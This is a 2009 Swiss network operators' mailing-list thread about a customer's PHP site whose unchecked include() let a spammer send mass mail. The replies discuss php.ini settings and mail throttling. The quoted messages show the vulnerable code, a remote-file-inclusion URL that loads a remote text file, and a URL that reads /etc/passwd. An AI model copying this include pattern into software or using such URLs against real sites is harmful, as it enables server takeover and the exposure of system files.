Re: [swinog] F*ing Spammers and stupid customer code...
And disable curl module BTW ;) On Thu, Feb 19, 2009 at 4:41 PM, Radek Mrskos mrs...@volume.ch wrote: I think, this is what you should have anyway in your php.ini allow_url_fopen = Off /Radek ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Re: [swinog] F*ing Spammers and stupid customer code...
luckily in this very single case! :) On 19.02.2009, at 17:05, Mike Kellenberger wrote: luckily in this case: it's a windows server... regards, mike -- Mike Kellenberger mike.kellenber...@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork -Ursprüngliche Nachricht- Von: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch ] Im Auftrag von Gianni Carafa Gesendet: Donnerstag, 19. Februar 2009 17:04 An: swi...@swinog.ch Betreff: Re: [swinog] F*ing Spammers and stupid customer code... Thats bad coding anyway : http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd Regards Gianni Radek Mrskos schrieb: I think, this is what you should have anyway in your php.ini allow_url_fopen = Off /Radek Am 19.02.2009 um 16:31 schrieb Mike Kellenberger: Hi all Just stopped our mail server from spitting out thousands of spam messages. We have a customer who has a site with the following (stupid) code in his index.php: if($called_page_link!=) { $requested_file=$called_page_link; } include($requested_file); The f*ing spammer found out about this and called the page with: http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt? Boom. Have I already told you that I hate spammers? :-) Oh well, one down - a few million to go... Regards, Mike -- Mike Kellenberger mike.kellenber...@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog Mit freundlichen Grüssen Radek Mrskos Email: mrs...@volume.ch Baechlerstr. 12Tel: +41 43 534 40 24 CH-8802 Kilchberg Mob: +41 79 219 68 66 PGP:0x8CB69F6D Fax: +41 86079 2196 866 ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Re: [swinog] F*ing Spammers and stupid customer code...
luckily in this case: it's a windows server... regards, mike -- Mike Kellenberger mike.kellenber...@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork -Ursprüngliche Nachricht- Von: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] Im Auftrag von Gianni Carafa Gesendet: Donnerstag, 19. Februar 2009 17:04 An: swi...@swinog.ch Betreff: Re: [swinog] F*ing Spammers and stupid customer code... Thats bad coding anyway : http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd Regards Gianni Radek Mrskos schrieb: I think, this is what you should have anyway in your php.ini allow_url_fopen = Off /Radek Am 19.02.2009 um 16:31 schrieb Mike Kellenberger: Hi all Just stopped our mail server from spitting out thousands of spam messages. We have a customer who has a site with the following (stupid) code in his index.php: if($called_page_link!=) { $requested_file=$called_page_link; } include($requested_file); The f*ing spammer found out about this and called the page with: http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt? Boom. Have I already told you that I hate spammers? :-) Oh well, one down - a few million to go... Regards, Mike -- Mike Kellenberger mike.kellenber...@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog Mit freundlichen Grüssen Radek Mrskos Email: mrs...@volume.ch Baechlerstr. 12Tel: +41 43 534 40 24 CH-8802 Kilchberg Mob: +41 79 219 68 66 PGP:0x8CB69F6D Fax: +41 86079 2196 866 ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Re: [swinog] F*ing Spammers and stupid customer code...
Hey Mike First thing to remember: never get nervous about a spammer! There are too many out there. It's just not worth your time to get angry about such things... It was our choice to get sysadmins - spamfighting is one of our big daily tasks. We might as well work for McDonalds - there's spam too. Turning off allow_url_fopen CURL might give you some headaches about customers that definitely need the option to fetch remote data. So here's my recommended setup (allow_url_include was introduced in PHP 5.2.0): allow_url_fopen = On allow_url_include = Off This will prevent you from the most stupid spammers, at least. Next, work on some secure PHP setup, say: running PHP as CGI with Apache's SuExec. You should also throttle emails sent by PHP, e.g. with a simple sendmail wrapper: http://www.iezzi.ch/archives/258 http://www.iezzi.ch/archives/217 Regards, Philip -- Onlime Webhosting Wachterweg 21 CH-8057 Zürich phone +41 44 508 0702 skype ondalime i...@onlime.ch - http://www.onlime.ch On 19.02.2009, at 16:46, Mike Kellenberger wrote: totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-) Regards, Mike -- Mike Kellenberger mike.kellenber...@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork -Ursprüngliche Nachricht- Von: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch ] Im Auftrag von Radek Mrskos Gesendet: Donnerstag, 19. Februar 2009 16:41 An: Mike Kellenberger Cc: swi...@swinog.ch Betreff: Re: [swinog] F*ing Spammers and stupid customer code... I think, this is what you should have anyway in your php.ini allow_url_fopen = Off /Radek Am 19.02.2009 um 16:31 schrieb Mike Kellenberger: Hi all Just stopped our mail server from spitting out thousands of spam messages. We have a customer who has a site with the following (stupid) code in his index.php: if($called_page_link!=) { $requested_file=$called_page_link; } include($requested_file); The f*ing spammer found out about this and called the page with: http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocit ies.com/nimiuu/fuck.txt? Boom. Have I already told you that I hate spammers? :-) Oh well, one down - a few million to go... Regards, Mike -- Mike Kellenberger mike.kellenber...@escapenet.ch Escapenet - the Web Company Tel +41 52 235 0700 http://www.escapenet.ch Skype mikek70atwork ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog Mit freundlichen Grüssen Radek Mrskos Email: mrs...@volume.ch Baechlerstr. 12Tel: +41 43 534 40 24 CH-8802 Kilchberg Mob: +41 79 219 68 66 PGP:0x8CB69F6D Fax: +41 86079 2196 866 ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Re: [swinog] F*ing Spammers and stupid customer code...
Mike Kellenberger wrote: totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-) Actually, this problem is known since ages. I wonder, why you fall into that right now. But what I really realise is, that this list is populated by Swiss Hosting Sysadmins from all important hosters. But they don't really share their experience and their actual problems. I mean in my old hosting days, I was glad to have some direct connections (for example per IRC), where I just could point out some troubles and solve them quickly. So Hosting-Sysadmins, please get together and share your mind! This list is very network related and this is good so. Probably an other list would suit better for all hosters. Cheerz, - Dan PS: If I still was with a hoster, I would now take care of that. So maybe someone else can take the initiative. ___ swinog mailing list swinog@lists.swinog.ch http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog